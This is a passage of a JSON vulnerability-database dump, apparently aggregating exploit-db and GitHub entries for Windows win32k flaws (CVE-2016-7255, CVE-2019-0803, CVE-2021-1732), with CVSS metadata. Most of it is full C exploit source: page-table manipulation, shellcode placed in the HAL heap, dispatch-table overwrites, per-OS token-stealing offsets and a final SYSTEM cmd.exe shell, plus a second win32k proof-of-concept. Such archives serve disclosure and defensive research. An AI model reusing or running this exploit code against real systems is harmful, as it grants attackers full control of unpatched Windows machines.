the PxE\r\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n\tif (patch_original) {\r\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\r\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\r\n\t}\r\n \r\n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\tprintf(\"\\n\\n\");\r\n\treturn spurious_pt;\r\n}\r\n\r\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteAddress += (target_address & 0xFFF);\r\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n\treturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n\r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteTarget += (target_address & 0xFFF);\r\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n\t*(PVOID *)target = (PVOID)hook_address;\r\n}\r\n\r\n\r\nUINT64 store_shellcode_in_hal(void) {\r\n\t//// Finally store the shellcode on the HAL\r\n\r\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n\r\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\r\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode \r\n\t// 0xfff - 0xd50 = 0x2af space\r\n\r\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n\treturn 0xffffffffffd00d50;\r\n}\r\n\r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\r\n\r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n\r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\r\n\r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n\r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n\r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n\r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n\r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n\r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n\r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n\r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n\r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n\r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n\r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n\r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n\r\n return HalDispatchTable;\r\n}\r\n\r\nint __cdecl main(int argc, char** argv)\r\n{\r\n\tTCHAR pre_username[256];\r\n\tTCHAR post_username[256];\r\n\tDWORD size = 256;\r\n\tULONG Interval = 0;\r\n\tHMODULE hNtDll = NULL;\r\n\tUINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n\tint osversion;\r\n\r\n\tif (argc != 2) {\r\n\t\tprintf(\"Please enter an OS version\\n\");\r\n\t\tprintf(\"The following OS'es are supported:\\n\");\r\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\r\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n\t\tprintf(\"\\n\");\r\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\t\r\n\tosversion = _strtoui64(argv[1], NULL, 10);\r\n\t\r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 0x8; \t\t\t\t// QueryIntervalProfile \r\n }\r\n\telse if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 10)\r\n {\r\n // the target machine's OS is Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n\tprintf(\"Current Username: %s\\n\", pre_username);\r\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n\tprintf(\"Enter to continue...\\n\");\r\n\tgetchar();\r\n\r\n\tdo\r\n\t{\r\n\t\tor_address_value_4((void*)PML4_SELF_REF);\r\n\t} while (FALSE);\r\n\r\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n\t\r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n\r\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n\tDWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! */\r\n\tchar *p = shellcode;\r\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\r\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n\r\n\tp += 12; // Patch shellcode with original value in the Overwrite address\r\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n\r\n\tp += 12; // To patch the PID of our process\r\n\t\r\n\t*(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n\t\r\n\tif (osversion == 7){\r\n\t\t// Exploit Win7.1\r\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\r\n\r\n\t\tif (!hNtDll) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\r\n\t\r\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n\r\n\t\tif (!NtQueryIntervalProfile) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\t\r\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\r\n\t}\r\n\r\n\t\r\n\twhile (1) {\r\n\t\tsize = 256;\r\n\t\tGetUserName(post_username, &size);\r\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\r\n\t}\r\n\tSleep(2000);\r\n\tsystem(\"cmd.exe\");\r\n\r\n\r\n\treturn 0;\r\n}", "sourceHref": "https://www.exploit-db.com/download/41015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T17:38:41", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-09T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-7255", "CVE-2016-0075", "CVE-2016-7255"], "modified": "2016-11-09T00:00:00", "id": "EDB-ID:40745", "href": "https://www.exploit-db.com/exploits/40745", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\nFull Proof of Concept:\r\n\r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip\r\n\r\n********************************************************************\r\n Created:\t2016-11-09 14:23:09\r\n Filename: \tmain.c\r\n Author:\troot[at]TinySec.net\r\n Version\t0.0.0.1\r\n Purpose:\tpoc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList=NULL;\r\n\tULONG ulRet = 0;\r\n\t\r\n\tdo \r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n\t\t\r\n\t\tva_start(VaList,Format);\r\n\t\t\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\t\t\r\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\t\t\r\n\t\tva_end(VaList);\r\n\t\t\r\n\t} while (FALSE);\r\n\t\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\t\r\n\treturn ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = 0;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n\t INPUT stInput = {0};\r\n\t \r\n\t do \r\n\t {\r\n\t\t stInput.type = INPUT_KEYBOARD;\r\n\t\t stInput.ki.wVk = wKey;\r\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\t\t \r\n\t\t SendInput(1 , &stInput , sizeof(stInput) );\r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n\t int i = 0;\r\n\t \r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\t\t \r\n\t\t\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\r\n\t\t_sim_key_down( VK_ESCAPE);\r\n\t\t_sim_key_up( VK_ESCAPE);\r\n\t\t\t \r\n\t\t _sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \t \r\n\t\t \r\n\t\t \r\n\t } while (FALSE);\r\n\t \r\n\t return 0;\r\n}\r\n\r\n \r\n\r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n\t int i = 0;\r\n\t HWND hWnd = NULL;\r\n\r\n\r\n\t int nFinalRet = -1;\r\n\r\n\t do \r\n\t {\r\n\t\t _sim_key_down( VK_MENU );\r\n\t\t _sim_key_down( VK_SHIFT );\t \r\n\r\n\r\n\t\t for ( i = 0; i < nCount ; i++)\r\n\t\t {\r\n\t\t\t _sim_key_down( VK_TAB);\r\n\t\t\t _sim_key_up( VK_TAB);\r\n\t\t\t \r\n\t\t\t Sleep(1000);\r\n\r\n\t\t }\r\n\t\r\n\t\t \r\n\t\t_sim_key_up( VK_MENU );\r\n\t\t _sim_key_up( VK_SHIFT );\t \r\n\t } while (FALSE);\r\n\t \r\n\t return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = {0};\r\n\r\n\tHWND\thWndParent = NULL;\r\n\tHWND\thWndChild = NULL;\r\n\r\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\r\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid*\tpId = NULL;\r\n\tMSG\t\tstMsg = {0};\r\n\r\n\tdo \r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\t\t\r\n\t\tif ( 0 == RegisterClassExW(&stWC) )\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\t\t\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t#ifdef _WIN64\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \r\n\t\t#else\r\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \r\n\t\t#endif // #ifdef _WIN64\r\n\t\t\r\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n\t\tDebugBreak();\r\n\r\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild , GetDesktopWindow() );\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\t\t\r\n\t\tSwitchToThisWindow(hWndChild , TRUE);\r\n\t\t\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\r\n\t\twhile( GetMessage(&stMsg , NULL , 0 , 0) )\r\n\t\t{\t\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t}\r\n\t\r\n\r\n\t} while (FALSE);\r\n\r\n\tif ( NULL != hWndParent )\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif ( NULL != hWndChild )\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n\treturn 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n\tdo \r\n\t{\r\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\r\n\t} while (FALSE);\r\n\t\r\n\treturn 0;\r\n}", "sourceHref": "https://www.exploit-db.com/download/40745", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-13T05:32:52", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-15T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'Win32k' Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-0803", "2019-0803"], "modified": "2019-05-15T00:00:00", "id": "EDB-ID:46920", "href": "https://www.exploit-db.com/exploits/46920", "sourceData": "# CVE-2019-0803\r\nWin32k Elevation of Privilege Poc\r\n\r\nReference\r\n-----------------------------\r\n(steal Security token) https://github.com/mwrlabs/CVE-2016-7255\r\n\r\n\r\nEDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip", "sourceHref": "https://www.exploit-db.com/download/46920", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2021-12-10T15:37:09", "description": "# CVE-2021-1732\n\n- \u6f0f\u6d1e\u53d1\u751f\u5728Windows \u56fe\u5f62\u9a71\u52a8`win32kfull!NtUserCreateWind...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T01:28:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-11-08T01:36:42", "id": "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:32:27", "description": "# CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T02:13:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-02-16T09:53:06", "id": "DEAA3BF4-9E7D-55E9-9534-6203A312C46F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-18T12:50:14", "description": "# CVE-2021-1732-Exploit\nCVE-2021-1...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T01:35:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, 